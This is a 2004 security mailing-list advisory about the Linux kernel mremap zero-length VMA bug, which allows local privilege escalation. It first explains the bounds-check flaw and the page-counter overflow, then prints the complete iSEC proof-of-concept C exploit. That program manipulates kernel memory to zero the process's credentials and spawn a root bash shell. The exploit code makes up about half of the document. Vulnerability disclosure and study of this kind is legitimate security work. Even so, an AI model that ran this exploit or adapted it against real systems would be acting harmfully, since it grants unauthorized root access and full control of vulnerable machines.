[UNIX] Linux Kernel do_mremap Local Privilege Escalation Vulnerability (Technical Details)

From: SecuriTeam (support_at_securiteam.com)
Date: 01/15/04

    To: list@securiteam.com
    Date: 15 Jan 2004 18:09:40 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

    - - - - - - - - -

    Linux Kernel do_mremap Local Privilege Escalation Vulnerability
    (Technical Details)
    ------------------------------------------------------------------------

    SUMMARY

    A critical security vulnerability has been found in the Linux kernel
    memory management code, in the mremap(2) system call, caused by an
    incorrect bounds check. This advisory sheds more light on the issue and
    provides a more accurate means of testing for the vulnerability (via an
    exploit).

    DETAILS

    Vulnerable systems:
     * Linux kernel 2.4 up to 2.4.23 and 2.6.0

    The mremap system call resizes (shrinks or grows) existing virtual
    memory areas (VMAs), or any part of them, and can also move them within
    the process's addressable space.

    A typical VMA covers at least one memory page (which is exactly 4kB on the
    i386 architecture). An incorrect bound check discovered inside the
    do_mremap() kernel code performing remapping of a virtual memory area may
    lead to creation of a virtual memory area of 0 bytes in length.

    The problem is based on a general mremap flaw: remapping 2 pages from
    inside a VMA creates a memory hole only one page in length but also an
    additional VMA of two pages. For a zero-sized remapping request, no VMA
    hole is created, but an additional VMA descriptor of 0 bytes in length
    is.

    Such a malicious virtual memory area may disrupt the operation of other
    kernel memory management routines, ultimately leading to unexpected
    behavior.

    A typical process's memory layout, showing an invalid VMA created with
    the mremap system call:

        08048000-0804c000 r-xp 00000000 03:05 959142 /tmp/test
        0804c000-0804d000 rw-p 00003000 03:05 959142 /tmp/test
        0804d000-0804e000 rwxp 00000000 00:00 0
        40000000-40014000 r-xp 00000000 03:05 1544523 /lib/ld-2.3.2.so
        40014000-40015000 rw-p 00013000 03:05 1544523 /lib/ld-2.3.2.so
        40015000-40016000 rw-p 00000000 00:00 0
        4002c000-40158000 r-xp 00000000 03:05 1544529 /lib/libc.so.6
        40158000-4015d000 rw-p 0012b000 03:05 1544529 /lib/libc.so.6
        4015d000-4015f000 rw-p 00000000 00:00 0
    [*] 60000000-60000000 rwxp 00000000 00:00 0
        bfffe000-c0000000 rwxp fffff000 00:00 0

    The broken VMA in the above example has been marked with a [*].

    Exploitation:
    The iSEC team has identified multiple attack vectors for this bug. This
    section describes the page counter method; however, we strongly believe
    that a much faster and more convenient method exists.

    As mentioned above, a VMA of 0 bytes in size can be introduced into the
    process's virtual memory list. Its unusual size renders such a VMA
    partially invisible to the kernel's main VM helper routine, find_vma().
    The find_vma(ADDR) function returns the first VMA descriptor (START,
    END) from the current process's list satisfying ADDR < END, or NULL if
    there is none. Given a VMA that starts and ends at the same address
    ADDR, a search for ADDR fails this condition (ADDR < ADDR is false), so
    the next VMA in the list is returned instead.

    After creating the bogus VMA descriptor in kernel memory, the mremap()
    code calls the insert_vm_struct() helper function, which in turn checks
    the new location by calling find_vma(). That helper returns the wrong
    result if a zero-sized VMA is already present at the new location.
    Therefore, it is possible to introduce multiple bogus VMA descriptors
    for the same virtual memory address. This happens only if the adjacent
    zero-sized VMAs differ in their descriptor flags, because otherwise they
    will be linked together in insert_vm_struct().

    The process's virtual memory list could then look like this:

        08048000-080a2000 r-xp 00000000 03:02 53159 /tmp/test
        080a2000-080a5000 rw-p 00059000 03:02 53159 /tmp/test
        080a5000-080a6000 rwxp 00000000 00:00 0
        40000000-40001000 r--p 00000000 00:00 0
        60000000-60000000 r--p 00000000 00:00 0
        60000000-60000000 rw-p 00000000 00:00 0
        60000000-60000000 r--p 00000000 00:00 0
        60000000-60001000 rwxp 00000000 00:00 0
        bffff000-c0000000 rwxp 00000000 00:00 0

    Furthermore, we have found an off-by-one increment inside the
    copy_page_range() function, affecting the page counter of the first VMA
    page directly following a zero-sized VMA. This is not a bug in the
    copy_page_range() code itself; it is merely how the code behaves for a
    combined zero-sized and non-zero VMA. The copy_page_range() function is
    called on fork() to copy the parent's page tables into the child
    process.

    Moreover, it is possible to remove a zero-sized VMA from the virtual
    memory list if another suitable VMA is mapped directly below the
    starting address of the 0-VMA. Suitable means that the new VMA must have
    exactly the same attributes (read, exec, etc.) as the following
    zero-sized VMA and must not map a file. This again is a feature of the
    mmap() system call, which tries to minimize the number of VMA
    descriptors in use by merging them where possible. Note that merging
    the VMAs does not influence any page counters in the following VMAs.

    Combining the findings above, we conclude that it is possible to
    increment the page counter of the first VMA page arbitrarily by
    repeatedly forking a process with a zero-sized VMA 'sandwich'. Cleanup
    must be done in the child before it calls exit(); otherwise the kernel
    would print a nasty error message while trying to remove the bogus VMA
    mappings.

    The goal is to overflow the page counter so that it becomes 1 again in
    the child process. If the corresponding VMA is then unmapped, the page
    counter drops to 0 and the page is returned to the kernel memory
    management. Note that the parent still holds a reference to the freed
    page in its page table, which makes manipulation of kernel memory
    possible.

    Let us take a closer look at how the page counter is incremented. We
    can introduce M 0-sized VMAs (marked with A's and B's) directly before
    the victim VMA hosting the page whose counter we want to overflow. If
    the victim maps anonymous memory, the first write access to the victim
    VMA page (marked with P) will allocate and insert a fresh page frame
    into the process's page table, and the page counter will be set to 1:

    [A][B][A][B] ... [A][P VICTIM ]

    After the first fork(), P's page counter becomes 1 + M + 1: the first 1
    is for the original copy in the parent, M is for the bogus VMAs, and the
    final 1 is for the copy in the child. Cleaning up the 0-VMAs in the
    child does not change the page counter; however, the counter is
    decremented by one when the child exits. Thus after the first
    fork()-exit() pair it becomes 1 + M. Taking integer overflow into
    account, we conclude that after N forks, and without the final exit()
    call in the child, the following equation holds:

    1 + M*N + 1 = 1 (mod 2^32)

    Or that

    M*N = 2^32-1 = 3 * 5 * 17 * 257 * 65537

    Thus we can, for example, create (3*5*257) 0-sized VMAs and fork the
    parent (17*65537) times to overflow P's page counter. This can take
    quite a long time: run times ranging from about one hour on a fast
    machine to more than 10 hours have been observed.

    Further exploitation proves to be easy because the kernel page
    management has the convenient property of using a kind of reversed LRU
    policy for page allocation: a page that has just been released to the
    kernel MM subsystem will be returned by a subsequent allocation
    request. The released page could, for example, be allocated to a file
    mapping that we can normally only read from, or to kernel structures,
    etc.

    It is worth noting that the parent's page reference (PTE) must be
    unprotected before we can use it to modify page contents because fork()
    will mark it as read only (for copy-on-write reasons).

    Impact:
    Since no special privileges are required to use the mremap(2) system
    call, any process may misuse its unexpected behavior to disrupt the
    kernel memory management subsystem. Proper exploitation of this
    vulnerability may lead to local privilege escalation, including
    execution of arbitrary code with kernel-level access. Proof-of-concept
    exploit code has been created and successfully tested, giving a UID 0
    shell on vulnerable systems.

    All users are encouraged to patch all vulnerable systems as soon as
    appropriate vendor patches are released.

    Exploit:
    /*
     * Linux kernel mremap() bound checking bug exploit.
     *
     * Bug found by Paul Starzetz <paul@isec.pl>
     *
     * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
     *
     * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
     * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
     * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <syscall.h>
    #include <signal.h>
    #include <time.h>
    #include <sched.h>

    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <sys/wait.h>

    #include <asm/page.h>

    #define MREMAP_MAYMOVE 1
    #define MREMAP_FIXED 2

    #define str(s) #s
    #define xstr(s) str(s)

    #define DSIGNAL SIGCHLD
    #define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
    #define PAGEADDR 0x2000

    #define RNDINT 512

    #define NUMVMA (3 * 5 * 257)
    #define NUMFORK (17 * 65537)

    #define DUPTO 1000
    #define TMPLEN 256

    #define __NR_sys_mremap 163

    _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
    ulong, e);
    unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
    unsigned long new_len,
           unsigned long flags, unsigned long new_addr);

    static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy =
    0, uid, gid;
    static volatile int *vma_ro, *vma_rw, *tmp;
    static volatile unsigned fake_file[16];

    void fatal(const char * msg)
    {
      printf("\n");
      if (!errno) {
        fprintf(stderr, "FATAL: %s\n", msg);
      } else {
        perror(msg);
      }

      printf("\nentering endless loop");
      fflush(stdout);
      fflush(stderr);
      while (1) pause();
    }

    void kernel_code(void * file, loff_t offset, int origin)
    {
      int i, c;
      int *v;

      if (!file)
        goto out;

      __asm__("movl %%esp, %0" : : "m" (c));

      c &= 0xffffe000;
      v = (void *) c;

      for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
        if (v[i] == uid && v[i+1] == uid) {
          i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
        }
        if (v[i] == gid) {
          v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
          break;
        }
      }
    out:
      dummy++;
    }

    void try_to_exploit(void)
    {
      int v = 0;

      v += fops[0];
      v += fake_file[0];

      kernel_code(0, 0, v);
      lseek(DUPTO, 0, SEEK_SET);

      if (geteuid()) {
        printf("\nFAILED uid!=0"); fflush(stdout);
        errno =- ENOSYS;
        fatal("uid change");
      }

      printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);

      kill(ppid, SIGUSR1);
      setresuid(0, 0, 0);
      sleep(1);

      printf("\n\n"); fflush(stdout);

      execl("/bin/bash", "bash", NULL);
      fatal("burp");
    }

    void cleanup(int v)
    {
      victim[DUPTO] = victim[0];
      kill(0, SIGUSR2);
    }

    void redirect_filp(int v)
    {
      printf("\n[!] parent check race... "); fflush(stdout);

      if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
        printf("SUCCESS, caught SLAB page!"); fflush(stdout);
        victim[DUPTO] = (unsigned) & fake_file;
        signal(SIGUSR1, &cleanup);
        kill(pid, SIGUSR1);
      } else {
        printf("FAILED!");
      }
      fflush(stdout);
    }

    int get_slab_objs(void)
    {
      FILE * fp;
      int c, d, u = 0, a = 0;
      static char line[TMPLEN], name[TMPLEN];

      fp = fopen("/proc/slabinfo", "r");
      if (!fp)
        fatal("fopen");

      fgets(name, sizeof(name) - 1, fp);
      do {
        c = u = a =- 1;
        if (!fgets(line, sizeof(line) - 1, fp))
          break;
        c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d,
    &d);
      } while (strcmp(name, "size-4096"));
      
      fclose(fp);

      return c == 7 ? a - u : -1;
    }

    void unprotect(int v)
    {
      int n, c = 1;

      *victim = 0;
      printf("\n[+] parent unprotected PTE "); fflush(stdout);

      dup2(0, 2);
      while (1) {
        n = get_slab_objs();
        if (n < 0)
          fatal("read slabinfo");
        if (n > 0) {
          printf("\n depopulate SLAB #%d", c++);
          blah = 0; kill(hpid, SIGUSR1);
          while (!blah) pause();
        }
        if (!n) {
          blah = 0; kill(hpid, SIGUSR1);
          while (!blah) pause();
          dup2(0, DUPTO);
          break;
        }
      }

      signal(SIGUSR1, &redirect_filp);
      kill(pid, SIGUSR1);
    }

    void cleanup_vmas(void)
    {
      int i = NUMVMA;

      while (1) {
        tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
            MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
        if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
          printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
          fatal("unmap1");
        }
        i--;
        if (!i)
          break;

        tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE,
    PROT_READ|PROT_WRITE,
            MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
        if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
          printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
          fatal("unmap2");
        }
        i--;
        if (!i)
          break;
      }
    }

    void catchme(int v)
    {
      blah++;
    }

    void exitme(int v)
    {
      _exit(0);
    }

    void childrip(int v)
    {
      waitpid(-1, 0, WNOHANG);
    }

    void slab_helper(void)
    {
      signal(SIGUSR1, &catchme);
      signal(SIGUSR2, &exitme);
      blah = 0;

      while (1) {
        while (!blah) pause();

        blah = 0;
        if (!fork()) {
          dup2(0, DUPTO);
          kill(getppid(), SIGUSR1);
          while (1) pause();
        } else {
          while (!blah) pause();
          blah = 0; kill(ppid, SIGUSR2);
        }
      }
      exit(0);
    }

    int main(void)
    {
      int i, r, v, cnt;
      time_t start;

      srand(time(NULL) + getpid());
      ppid = getpid();
      uid = getuid();
      gid = getgid();

      hpid = fork();
      if (!hpid)
        slab_helper();

      fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
          MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
      if (fops == MAP_FAILED)
        fatal("mmap fops VMA");
      for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
        fops[i] = (unsigned)&kernel_code;
      for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
        fake_file[i] = (unsigned)fops;

      vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
      if (vma_ro == MAP_FAILED)
        fatal("mmap1");

      vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE,
    MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
      if (vma_rw == MAP_FAILED)
        fatal("mmap2");

      cnt = NUMVMA;
      while (1) {
        r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE,
    PAGEADDR);
        if (r == (-1)) {
          printf("\n[-] ERROR remapping"); fflush(stdout);
          fatal("remap1");
        }
        cnt--;
        if (!cnt) break;

        r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE,
    PAGEADDR);
        if (r == (-1)) {
          printf("\n[-] ERROR remapping"); fflush(stdout);
          fatal("remap2");
        }
        cnt--;
        if (!cnt) break;
      }

      victim = mmap((void*)PAGEADDR, PAGE_SIZE,
    PROT_EXEC|PROT_READ|PROT_WRITE,
          MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
      if (victim != (void *) PAGEADDR)
        fatal("mmap victim VMA");

      v = *victim;
      *victim = v + 1;

      signal(SIGUSR1, &unprotect);
      signal(SIGUSR2, &catchme);
      signal(SIGCHLD, &childrip);
      printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
      start = time(NULL);

      cnt = NUMFORK;
      v = 0;
      while (1) {
        cnt--;
        v--;
        dummy += *victim;

        if (cnt > 1) {
          __asm__(
          "pusha \n"
          "movl %1, %%eax \n"
          "movl $("xstr(CLONEFL)"), %%ebx \n"
          "movl %%esp, %%ecx \n"
          "movl $120, %%eax \n"
          "int $0x80 \n"
          "movl %%eax, %0 \n"
          "popa \n"
          : : "m" (pid), "m" (dummy)
          );
        } else {
          pid = fork();
        }

        if (pid) {
          if (v <= 0 && cnt > 0) {
            float eta, tm;
            v = rand() % RNDINT / 2 + RNDINT / 2;
            tm = eta = (float)(time(NULL) - start);
            eta *= (float)NUMFORK;
            eta /= (float)(NUMFORK - cnt);
            printf("\r\t%u of %u [ %u %% ETA %6.1f s ] ",
            NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta -
    tm);
            fflush(stdout);
          }
          if (cnt) {
            waitpid(pid, 0, 0);
            continue;
          }
          if (!cnt) {
            while (1) {
               r = wait(NULL);
               if (r == pid) {
                 cleanup_vmas();
                while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
               }
            }
          }
        }

        else {
          cleanup_vmas();

          if (cnt > 0) {
            _exit(0);
          }

          printf("\n[+] overflow done, the moment of truth...");
    fflush(stdout);
          sleep(1);

          signal(SIGUSR1, &catchme);
          munmap(0, PAGE_SIZE);
          dup2(0, 2);
          blah = 0; kill(ppid, SIGUSR1);
          while (!blah) pause();

          munmap((void *)victim, PAGE_SIZE);
          dup2(0, DUPTO);

          blah = 0; kill(ppid, SIGUSR1);
          while (!blah) pause();
          try_to_exploit();
          while (1) pause();
        }
      }
      return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by Paul Starzetz
    <mailto:ihaquer@isec.pl>.

